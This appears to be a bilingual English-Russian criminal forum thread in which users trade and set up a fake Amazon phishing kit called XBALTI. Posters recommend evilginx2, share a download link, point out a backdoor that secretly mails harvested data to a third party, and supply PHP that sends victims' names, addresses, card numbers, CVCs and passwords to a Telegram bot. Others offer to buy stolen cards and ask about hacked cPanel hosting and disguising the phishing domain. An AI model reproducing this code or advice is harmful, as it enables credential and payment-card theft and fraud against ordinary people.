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do you have fake amazon website? | у вас есть поддельный сайт Amazon?


Midle Weight
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Do you have any fake amazon up-to-date template that you're willing to share for free?
Or do you do phishing? if you can phish one email for me (I have access) I will buy CC from you same price as shops

Есть ли у вас какой-нибудь поддельный обновленный шаблон amazon, которым вы готовы поделиться бесплатно?

Или вы занимаетесь фишингом? если вы можете отправить мне одно электронное письмо по электронной почте (у меня есть доступ) Я куплю CC у вас по той же цене, что и в магазинах
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You can use evilginx2 for phishing
Jayson V00rheez сказал(а):
You can use evilginx2 for phishing
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Thank you bro!

As you can see I'm a total noob in phishing, but with this reference to evilginx on github I think I can find many resources to learn and be able to make at least one phishing attack
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Hello i can share an amazon phishing page that a mf share it on a forum but its backdoored so you need to clean it up, i already found the backdoor

Link : https://anonfiles.com/F6M5H6v5xa/AMZ_2K22_zip

backdoor :

EthicX сказал(а):
Hello i can share an amazon phishing page that a mf share it on a forum but its backdoored so you need to clean it up, i already found the backdoor

Link : https://anonfiles.com/F6M5H6v5xa/AMZ_2K22_zip

backdoor :

Посмотреть вложение 32183

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Bro thank you big time!
I saw this template out there but I didn't know there's a backdoor.
Do you think this is the only one in the template or there's more?
jolkha сказал(а):
Bro thank you big time!
I saw this template out there but I didn't know there's a backdoor.
Do you think this is the only one in the template or there's more?
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Yeah i already analayse it , delete that line and you good to go
EthicX сказал(а):
Yeah i already analayse it , delete that line and you good to go
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I changed it to my own and I still don't receive anything. I'm testing on xampp. Is there a manual for XBALTI?
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Xampp dont support mail server
EthicX сказал(а):
Xampp dont support mail server
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Oh so that seems to be the problem. Should I try and buy hacked cpanel and test? or has to be speicifc Cpanel?
EthicX сказал(а):
Xampp dont support mail server
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I tried adding the website files on a real website, but still it doesn't send e-mail with results? how do we make it work? thanks


Actually the website not sending the results in to e-mail, but it's there in the /admin section

Hope it helps someone.
Последнее редактирование: 09.02.2022
jolkha сказал(а):
I tried adding the website files on a real website, but still it doesn't send e-mail with results? how do we make it work? thanks


Actually the website not sending the results in to e-mail, but it's there in the /admin section

Hope it helps someone.
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i would recommend to send data to telegram instead of email its more easy and unlike email you dont need any thing else to receive data
Пожалуйста, обратите внимание, что пользователь заблокирован
if you like the telegram thing here is a quick code integration that should work with that script

just copy and paste in the same file where the backdoor used to be

Скопировать в буфер обмена
$apiToken = "my_bot_api_token"; // change this

$data = [
'chat_id' => '@yourchannelname', // change this
'text' => $msg

$response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data) );
EthicX сказал(а):
if you like the telegram thing here is a quick code integration that should work with that script

just copy and paste in the same file where the backdoor used to be

Скопировать в буфер обмена
$apiToken = "my_bot_api_token"; // change this

$data = [
'chat_id' => '@yourchannelname', // change this

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Damn bro you rock! This worked. I made an API/Channel etc. and this actually worked. You are a great man.
Пожалуйста, обратите внимание, что пользователь заблокирован
backdoor found at the end of these files:


in XBALTI directory

$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);


$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);
$Email1 = 'mrx37583@yandex.com';
@mail($Email1, $subject, $msg, $headers);

What he receives:

$_SESSION['fullname'] = $_POST['fullname'];
$_SESSION['address'] = $_POST['address'];
$_SESSION['City'] = $_POST['City'];
$_SESSION['stat'] = $_POST['stat'];
$_SESSION['zipcode'] = $_POST['zipcode'];
$_SESSION['phonenumber'] = $_POST['phonenumber'];
$_SESSION['dob'] = $_POST['dob'];
$_SESSION['namecard'] = $_POST['namecard'];
$_SESSION['cardnumber'] = $_POST['cardnumber'];
$_SESSION['exdate'] = $_POST['exdate'];
$_SESSION['cvc'] = $_POST['cvc'];
$_SESSION['password'] = $_POST['password'];
$_SESSION['emaill'] = $_POST['emaill'];
Последнее редактирование: 10.02.2022
ghostmarket09 сказал(а):
backdoor found at the end of these files:


in XBALTI directory

$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);


$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);
$Email1 = '';
@mail($Email1, $subject, $msg, $headers);

What he receives:

$_SESSION['fullname'] = $_POST['fullname'];
$_SESSION['address'] = $_POST['address'];
$_SESSION['City'] = $_POST['City'];
$_SESSION['stat'] = $_POST['stat'];
$_SESSION['zipcode'] = $_POST['zipcode'];
$_SESSION['phonenumber'] = $_POST['phonenumber'];
$_SESSION['dob'] = $_POST['dob'];
$_SESSION['namecard'] = $_POST['namecard'];
$_SESSION['cardnumber'] = $_POST['cardnumber'];
$_SESSION['exdate'] = $_POST['exdate'];
$_SESSION['cvc'] = $_POST['cvc'];
$_SESSION['password'] = $_POST['password'];
$_SESSION['emaill'] = $_POST['emaill'];
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Yes thank you for your help! I removed it and added the tg channel update instead
Jayson V00rheez сказал(а):
You can use evilginx2 for phishing
Пожалуйста, обратите внимание, что пользователь заблокирован

I want to make a new attempt at this using evilginx2 but I've got a question - what is the best way way to hide the domain name to amazon?
Последнее редактирование: 19.02.2022